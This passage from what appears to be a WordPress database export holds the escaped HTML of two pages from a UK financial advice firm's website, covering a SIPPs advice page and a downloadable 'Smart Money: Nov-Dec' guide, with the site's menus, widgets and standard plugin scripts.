id=\"reading-box-container-3\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#fafafa !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Book Now</a><h2>It’s all so simple. To book a chat with our investment experts, click the link.</h2><p>It\'s free, and we think you\'ll like what you hear.</p><a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div></div></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"http://www.equalitywalk.org.uk/portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/11/cats-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cats\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/cric-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cric\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/auto-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"auto\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/investing-income/\" title=\"Investing For Income\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/investing-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"investing\"/></a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://www.equalitywalk.org.uk/feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	&#13;\n	<!-- W3TC-include-js-head -->&#13;\n&#13;\n	&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','SIPPs - Advice on SIPPs investments','SIPPs are great for anyone who likes managing their own investments and there is a great range of SIPPs available. Here\'s what you need to know.','publish','closed','closed','','sipps-advice-on-sipps-investments','','','2017-09-21 16:34:40','2017-09-21 16:34:40','',0,'http://www.equalitywalk.org.uk/sipps-advice-on-sipps-investments',0,'page','',0),(105,1,'2017-09-21 16:34:40','2017-09-21 16:34:40','<body class=\"single single-avada_portfolio postid-7126 light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4746\"><a href=\"/contact-us\">Contact</a></li>&#13;\n			</ul><div class=\"mobile-topnav-holder\"/>&#13;\n	</div>			</div>&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"header-info\">CALL US FREE ON <big><big><b/></big></big><span class=\"sep\">|</span><a href=\"mailto:Enquiries@equalitywalk.org.uk\">Enquiries@equalitywalk.org.uk</a></div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"/pensions\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pensions/pension-review\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"/best-annuity-rates\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"/better-pension-drawdown-annuity\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-3 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/investments\">Investments</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\"><span class=\"fusion-megamenu-bullet\"/>ISAs</a></li>&#13;\n		<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\"><span class=\"fusion-megamenu-bullet\"/>Lump Sum Investment</a></li>&#13;\n		<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\"><span class=\"fusion-megamenu-bullet\"/>Offshore Bonds</a></li>&#13;\n		<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\"><span class=\"fusion-megamenu-bullet\"/>Unit Trusts &amp; OEICs</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/trusts\">Trusts</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\"><span class=\"fusion-megamenu-bullet\"/>Asset Protection Trust</a></li>&#13;\n		<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\"><span class=\"fusion-megamenu-bullet\"/>Discretionary Trusts</a></li>&#13;\n		<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\"><span class=\"fusion-megamenu-bullet\"/>Absolute Trusts</a></li>&#13;\n		<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\"><span class=\"fusion-megamenu-bullet\"/>Gift &amp; Loan Trust</a></li>&#13;\n		<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\"><span class=\"fusion-megamenu-bullet\"/>Wills and Trust</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\"><span class=\"fusion-megamenu-bullet\"/>Critical Illness</a></li>&#13;\n		<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\"><span class=\"fusion-megamenu-bullet\"/>Serious Illness</a></li>&#13;\n		<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\"><span class=\"fusion-megamenu-bullet\"/>Relevant Life Plan</a></li>&#13;\n		<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\"><span class=\"fusion-megamenu-bullet\"/>Life Insurance</a></li>&#13;\n		<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\"><span class=\"fusion-megamenu-bullet\"/>Business Protection</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"/about-us\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"/our-team\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"/terms-of-use\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"/cookies\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"/category/video-2\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"/pension-reforms-offer-freedom-savers\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"/staging-date-social-advisors\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"/automatic-enrolment\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"/our-blog\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"/category/annuities\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"/category/insurance-protection\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"/category/investments\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"/category/pensions\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"/category/trusts\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"/category/wealth-management\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Smart Money: Nov-Dec										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a> /  <a href=\"/\" rel=\"tag\">Smart Money</a></li><li>Smart Money: Nov-Dec</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n			<div id=\"content\" class=\"portfolio-half \" style=\"width:100%\">&#13;\n										<div class=\"single-navigation clearfix\">&#13;\n									<a href=\"/portfolio-items/critical-illness-guide\" rel=\"prev\">Previous</a>&#13;\n											</div>&#13;\n						<div id=\"post-7126\" class=\"post-7126 avada_portfolio type-avada_portfolio status-publish has-post-thumbnail hentry\">&#13;\n									<div class=\"flexslider post-slideshow\">&#13;\n				<ul class=\"slides\"><li>&#13;\n												<a href=\"#\"/>&#13;\n											</li>&#13;\n																			</ul></div>&#13;\n																		<div class=\"project-content\">&#13;\n				<span class=\"entry-title\" style=\"display: none;\">Smart Money: Nov-Dec</span>&#13;\n				<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n				<span class=\"updated\" style=\"display: none;\">2017-11-22T10:04:49+00:00</span>&#13;\n				<div class=\"project-description post-content\" style=\"\">&#13;\n										<h3 style=\"\">Project Description&#13;\n										</h3><p><a href=\"http://www.equalitywalk.org.uk/smartmoneynovdec.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.equalitywalk.org.uk/smartmoneynovdec.pdf\']);\" target=\"_blank\">Click Here To Download Your Guide For FREE</a>.</p>&#13;\n				</div>&#13;\n								<div class=\"project-info\" style=\"\">&#13;\n					<p>Project Details</p>&#13;\n															<div class=\"project-info-box\">&#13;\n						<h4>Categories:</h4>&#13;\n						<div class=\"project-terms\">&#13;\n							<a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a><br/><a href=\"/\" rel=\"tag\">Smart Money</a>						</div>&#13;\n					</div>&#13;\n																													</div>&#13;\n							</div>&#13;\n			<div class=\"portfolio-sep\"/>&#13;\n						&#13;\n																				</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\"><div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"/leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/can-i-sell-my-pension-under-55\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/best-annuity-rates\">&#13;\n										<img width=\"52\" height=\"43\" src=\"/wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/best-annuity-rates\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														